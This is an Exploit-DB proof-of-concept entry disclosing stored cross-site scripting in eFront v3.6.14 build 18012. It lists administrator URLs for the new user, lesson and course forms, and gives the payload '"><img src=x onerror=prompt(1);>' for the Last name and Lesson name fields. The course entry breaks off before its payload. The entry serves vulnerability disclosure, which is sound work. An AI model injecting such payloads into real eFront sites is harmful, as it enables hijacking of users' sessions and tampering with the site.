44 lines
1.3 KiB
Text
Executable file
44 lines
1.3 KiB
Text
Executable file
###########################################################
|
|
|
|
Exploit-DB Note: Screenshot provided by exploit author.
|
|
|
|
###########################################################
|
|
[~] Exploit Title: eFront v3.6.14 (build 18012) -Stored XSS in multiple
|
|
Parameters
|
|
[~] Author: sajith
|
|
[~] version: eFront v3.6.14- build 18012
|
|
[~]Vendor Homepage: http://www.efrontlearning.net/
|
|
[~] vulnerable app link:http://www.efrontlearning.net/download
|
|
###########################################################
|
|
|
|
|
|
|
|
POC by sajith shetty:
|
|
|
|
[###]Log in with admin account and create new user
|
|
|
|
http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php?ctg=personal&user=root&op=profile&add_user=1
|
|
|
|
(Home ? Users ? Administrator S. (root) ? New user)
|
|
|
|
Here "Last name" field is vulnerable to stored XSS [payload:"><img src=x
|
|
onerror=prompt(1);> ]
|
|
|
|
|
|
|
|
[###]create new lesson option (
|
|
http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php
|
|
?
|
|
|
|
ctg=lessons&add_lesson=1) where "Lession name" is vulnerable to stored xss
|
|
|
|
[payload:"><img src=x onerror=prompt(1);> ]
|
|
|
|
|
|
|
|
[###]create new courses option(
|
|
http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php
|
|
?
|
|
|
|
ctg=courses&add_course=1) where "Course name:" filed is vulnerable to
|
|
stored XSS
|